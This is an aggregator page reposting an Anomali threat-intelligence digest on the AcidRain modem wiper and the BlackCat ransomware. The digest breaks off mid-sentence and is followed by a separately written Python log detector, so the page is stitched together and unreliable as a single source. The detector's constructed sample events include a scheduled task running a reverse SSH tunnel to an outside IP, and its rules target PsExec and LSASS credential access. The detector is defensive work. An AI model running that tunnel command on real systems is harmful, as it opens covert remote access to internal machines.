One Article Review

Source Anomali
Identifier 4400992
Publication date 2022-04-05 18:17:00 (viewed: 2022-04-05 19:06:05)
Title Anomali Cyber Watch: AcidRain Wiped Viasat Modems, BlackMatter Rewritten into BlackCat Ransomware, SaintBear Goes with Go, and More
Text The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Information stealers, Phishing, Russia, Ukraine, Vulnerabilities, and Wipers. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.

Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

AcidRain | A Modem Wiper Rains Down on Europe (published: March 31, 2022)

On February 24, 2022, Viasat KA-SAT modems became inoperable in Ukraine after threat actors exploited a misconfigured VPN appliance, compromised the KA-SAT network, and were able to execute management commands on a large number of residential modems simultaneously. SentinelOne researchers discovered a specific Linux wiper, dubbed AcidRain, that was likely used in that attack, as it shows the same targeting and the same overwriting method seen in a Viasat Surfbeam2 modem targeted in the attack. AcidRain shows code similarities with the VPNFilter stage 3 wiping plugin called dstr, but AcidRain's code appears to be sloppier, so the connection between the two is still under investigation.

Analyst Comment: Internet service providers are heavily targeted due to their trust relationships with their customers, and they should harden their configurations and access policies. Devices targeted by AcidRain can be brought back to service through a flash memory/factory reset. Organizations exposed to the Russia-Ukraine military conflict should plan for backup options in case of a wiper attack.

MITRE ATT&CK: [MITRE ATT&CK] Data Destruction - T1485 | [MITRE ATT&CK] System Shutdown/Reboot - T1529 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Supply Chain Compromise - T1195

Tags: AcidRain, Viasat KA-SAT, Russia, Ukraine, Germany, target-country:UA, target-country:DE, Wiper, Modem, Supply-chain compromise, VPN appliance, VPNFilter

BlackCat Ransomware (published: March 31, 2022)

BlackCat (ALPHV) ransomware-as-a-service surfaced on Russian-speaking underground forums in late 2021. The BlackCat ransomware is perhaps the first ransomware written entirely in Rust, and it is capable of targeting both Windows and Linux machines. It has targeted multiple industries in the US, Europe, the Philippines, and other regions, and Polyswarm researchers expect it to expand its operations. It is attributed to the BlackMatter/DarkSide ransomware threat group. BlackCat used some known BlackMatter infrastructure and shared the same techniques: reverse SSH tunnels and scheduled tasks for persistence, LSASS for credential access, and Impacket, RDP, and PsExec for command and control.

Analyst Comment: It is crucial for your company to ensure that servers are always running the most current software version. Your company should have policies in place regarding the proper configurations needed for your servers in order to conduct your business safely. Additionally, always practice Defense in Depth (do not rely on single security mechanisms; security measures should be layered, redundant, and failsafe). Furthermore, a business continuity plan should be in place in the case of a
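As an added illustration of how the BlackCat/BlackMatter techniques listed above (scheduled tasks, PsExec, LSASS access, RDP) can be matched against host event logs, here is a small Python detector that is not part of the Anomali digest. The pipe-delimited log format, host names and sample events are constructed, and the ATT&CK sub-technique mappings are my own assumptions, not the digest's.

```python
import re
from collections import Counter, defaultdict

# Constructed sample log lines (not real telemetry), one event per line as
# "<EventID>|<host>|<detail>", modelling the BlackCat/BlackMatter TTPs named above.
SAMPLE_EVENTS = r"""
4698|WS01|TaskName=\Updater Command=C:\Users\Public\ssh.exe -R 2222:localhost:3389 user@203.0.113.10
7045|SRV02|ServiceName=PSEXESVC ImagePath=%SystemRoot%\PSEXESVC.exe
10|SRV02|SourceImage=C:\Windows\Temp\proc.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1010
4624|SRV03|LogonType=10 Account=svc_backup Source=10.0.0.5
7045|SRV04|ServiceName=Spooler ImagePath=C:\Windows\System32\spoolsv.exe
4624|SRV03|LogonType=3 Account=svc_backup Source=10.0.0.7
"""

# Rules are (event id, regex on the detail field, ATT&CK id, description); the
# first rule that matches a line wins, so the more specific pattern is listed first.
# ATT&CK ids are the author's mapping, not taken from the digest.
RULES = [
    ("4698", r"ssh\S*\s+.*-R\s", "T1053.005", "scheduled task starting a reverse SSH tunnel"),
    ("4698", r".", "T1053.005", "scheduled task created"),
    ("7045", r"ServiceName=PSEXESVC\b", "T1569.002", "PsExec service installed"),
    ("10", r"TargetImage=\S*\\lsass\.exe", "T1003.001", "handle opened to LSASS"),
    ("4624", r"LogonType=10\b", "T1021.001", "interactive RDP logon"),
]

def classify(line):
    """Return (host, technique, description) for the first matching rule, else None."""
    try:
        event_id, host, detail = line.split("|", 2)
    except ValueError:
        return None  # blank or malformed line: skip it rather than abort the scan
    for rule_id, pattern, technique, description in RULES:
        if rule_id == event_id and re.search(pattern, detail, re.I):
            return host, technique, description
    return None

def scan(log_text):
    """Group hits by host so a host showing several TTPs in sequence stands out."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        result = classify(line)
        if result:
            host, technique, description = result
            hits[host].append((technique, description))
    return dict(hits)

def technique_counts(hits):
    """Count hits per ATT&CK technique across all hosts."""
    return dict(Counter(t for entries in hits.values() for t, _ in entries))
```

Running `scan(SAMPLE_EVENTS)` flags WS01, SRV02 and SRV03 while the benign Spooler service and network logon lines produce no hits.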
Sent Yes
Tags Ransomware Malware Tool Vulnerability Threat Guideline
Stories VPNFilter


The article does not seem to have been picked up after its publication.


The article does not seem to have been picked up from a previous one.